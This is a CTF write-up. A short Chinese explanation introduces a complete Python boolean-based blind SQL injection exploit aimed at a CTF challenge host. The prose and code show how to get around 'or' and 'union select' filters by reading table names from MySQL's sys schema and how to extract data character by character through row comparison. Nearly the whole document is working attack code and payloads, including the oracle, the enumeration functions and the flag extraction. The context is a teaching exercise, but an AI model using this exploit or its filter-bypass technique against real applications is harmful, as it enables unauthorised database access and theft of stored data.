测试出注入点
2-(ascii(substr(database(),1,1))>1)（条件为真时 id=2-1=1，返回 id=1 对应的页面；为假时 id=2-0=2，返回另一页面。两种响应的差异即为后续布尔盲注的判定依据）
由于过滤了 or 和 union select，`information_schema`（名称中含有子串 or）无法直接引用，也不能用 union 回显数据，因而无法通过常规手段获取表名和字段名。这里改用 MySQL 5.7 引入的 `sys` 库（`sys.schema_table_statistics_with_buffer` 视图）获得当前库的表名；再利用 MySQL 比较两行记录时逐列比较的特点，构造 `(1, 0x十六进制前缀) > (select * from 表 limit 1)` 形式的布尔盲注语句，逐字符猜解 flag。代码如下：
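# encoding=utf-8
"""Boolean-based blind SQL injection PoC from a CTF write-up.

The injectable parameter is ``id``.  Sending ``id=2-(<condition>)`` makes
the server look up id 1 when the condition is true (2-1) and id 2 when it
is false (2-0); only the id-1 page contains the marker string ``Nu1L``.
That page-content difference is the oracle every function below drives.

The application filters ``or`` and ``union select``.  ``information_schema``
is therefore unusable (its name contains ``or``), so the table list was
read from the MySQL 5.7+ ``sys`` schema instead, and the flag is extracted
with a row comparison ``(1, 0x<prefix>) > (select * from <table> limit 1)``.
MySQL compares rows column by column, so once the first columns are equal
the result is the string comparison of the second column, which yields one
character per position without needing ``or`` or ``union``.

Only the standard library is used; the write-up's version needed
``requests``.  Changes from the write-up: two-digit hex encoding, a
request timeout, proper termination once the value is complete, and the
two discovery steps (database name, table list) turned into callable
functions instead of commented-out code.
"""
import urllib.error
import urllib.parse
import urllib.request

TARGET_URL = 'http://66e367cd334d4fa788462962dc906f83ee74f3366aea4d1b.changame.ichunqiu.com/'
# Substring that appears only on the id-1 page, i.e. when the injected
# condition evaluated to true.
TRUE_MARKER = 'Nu1L'
# Table holding the flag, found with enumerate_table_names().
FLAG_TABLE = 'f1ag_1s_h3r3_hhhhh'
# Candidate characters for schema/table names: digits, letters, '_' and the
# punctuation the write-up tried (duplicated '`' is harmless).
NAME_CHARSET = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_,!@#$%^&*``.'
# Subquery whose value is the comma-separated table list of the current
# schema.  Taken from the sys schema because information_schema is blocked.
TABLES_EXPR = ('(select group_concat(table_name) from sys.schema_table_statistics_with_buffer '
               'where table_schema=database())')
# Seconds per request.  The original had no timeout, so a single stalled
# connection hung the whole extraction.
REQUEST_TIMEOUT = 10.0


def str_to_hex(s):
    """Return *s* hex-encoded for a MySQL ``0x...`` literal (no prefix).

    Encodes as UTF-8 and always emits two digits per byte.  The original
    ``hex(ord(c)).replace('0x', '')`` dropped the leading zero for code
    points below 0x10 and emitted 3-4 digits for non-ASCII code points;
    both corrupt the literal.  For printable ASCII the output is unchanged.
    """
    return s.encode('utf-8').hex()


def make_oracle(url, marker=TRUE_MARKER, timeout=REQUEST_TIMEOUT):
    """Build a boolean oracle ``ask(condition) -> bool`` for the ``id`` parameter.

    ``ask`` POSTs ``id=2-(<condition>)`` to *url* and reports whether the
    response body contains *marker* (true branch).  A non-2xx status is
    still inspected for the marker, mirroring the behaviour of
    ``requests`` in the original; connection errors and timeouts propagate
    to the caller instead of being misread as "false", which would
    silently corrupt the extracted value.
    """
    def ask(condition):
        body = urllib.parse.urlencode({"id": "2-(" + condition + ")"}).encode()
        req = urllib.request.Request(url, data=body)
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                text = resp.read().decode("utf-8", "replace")
        except urllib.error.HTTPError as err:
            # The error page is still a page; the marker decides, not the status.
            text = err.read().decode("utf-8", "replace")
        return marker in text
    return ask


def row_gt_condition(prefix, table):
    """SQL condition true when the row ``(1, prefix)`` sorts after *table*'s first row.

    MySQL compares rows column by column; with the first columns equal the
    comparison falls through to the second column, turning ``>`` on the
    whole row into a string comparison on the hidden value.  The constant
    ``1`` is assumed to equal the table's first column (its id) -- TODO
    confirm for any target other than the write-up's.
    """
    return "select (select 1,0x" + str_to_hex(prefix) + ")>(select * from " + table + " limit 1)"


def extract_flag(ask, table=FLAG_TABLE, max_len=62, *, verbose=True):
    """Recover the second column of *table*'s first row, one character per position.

    ``ask`` is a boolean oracle as returned by :func:`make_oracle`.  For
    each position every character from space (0x20) to DEL (0x7f) is
    tried in ascending order; the first ``c`` for which
    ``(1, prefix + c) > row`` holds is exactly one past the real
    character, so ``chr(ord(c) - 1)`` is appended.

    Termination: a hit on the very first candidate (space) means nothing
    sorts below it, i.e. the stored value ends here (or contains a
    control character); extraction stops.  The original loop had no such
    check and padded the result with spaces until *max_len* was reached.
    If no candidate sorts after the row the next character is outside the
    tried range and extraction stops with the partial value.

    NOTE(review): the comparison is assumed to be binary/byte-wise because
    the left operand is a hex literal; a PAD SPACE collation would make
    trailing spaces insignificant -- confirm on targets with other schemas.

    Returns the recovered string (possibly partial, see above); prints
    progress after each character when *verbose*.
    """
    lo, hi = 32, 128
    flag = ''
    for _ in range(max_len):
        hit = next((j for j in range(lo, hi)
                    if ask(row_gt_condition(flag + chr(j), table))), None)
        if hit is None or hit == lo:
            break
        flag += chr(hit - 1)
        if verbose:
            print(flag)
    return flag


def _guess_by_ascii(ask, expr, start, stop, charset):
    """Recover SQL expression *expr* char by char via ``ascii(substr(expr,pos,1))=N`` tests.

    1-based positions ``start..stop`` (inclusive) are probed; stops at the
    first position where no character of *charset* matches (end of value
    or a character outside the charset).  Returns the characters found.
    """
    out = []
    for pos in range(start, stop + 1):
        for ch in charset:
            if ask("ascii(substr(" + expr + "," + str(pos) + ",1))=" + str(ord(ch))):
                out.append(ch)
                break
        else:
            break
    return ''.join(out)


def enumerate_database_name(ask, max_len=32, charset=NAME_CHARSET):
    """Recover ``database()`` (write-up step 1); probes positions 1..*max_len*."""
    return _guess_by_ascii(ask, "database()", 1, max_len, charset)


def enumerate_table_names(ask, start=1, max_len=59, charset=NAME_CHARSET):
    """Recover the comma-separated table list of the current schema (write-up step 2).

    ``information_schema`` is blocked by the ``or`` filter, so the list is
    read from the MySQL 5.7+ view ``sys.schema_table_statistics_with_buffer``.
    NOTE(review): that view is fed by performance_schema table-I/O
    statistics, so a table never accessed since server start may be absent
    -- verify if an expected table does not show up.

    *start* is the 1-based position to resume from (the write-up resumed
    at 23 after an earlier partial run); positions ``start..max_len`` are
    probed.  The original appended these characters to the database-name
    variable; this returns them separately.
    """
    return _guess_by_ascii(ask, TABLES_EXPR, start, max_len, charset)


if __name__ == "__main__":
    ask = make_oracle(TARGET_URL)
    # The discovery steps were run once while writing the exploit; call
    # enumerate_database_name(ask) and enumerate_table_names(ask) to
    # reproduce how FLAG_TABLE was found.
    print("flag:", extract_flag(ask))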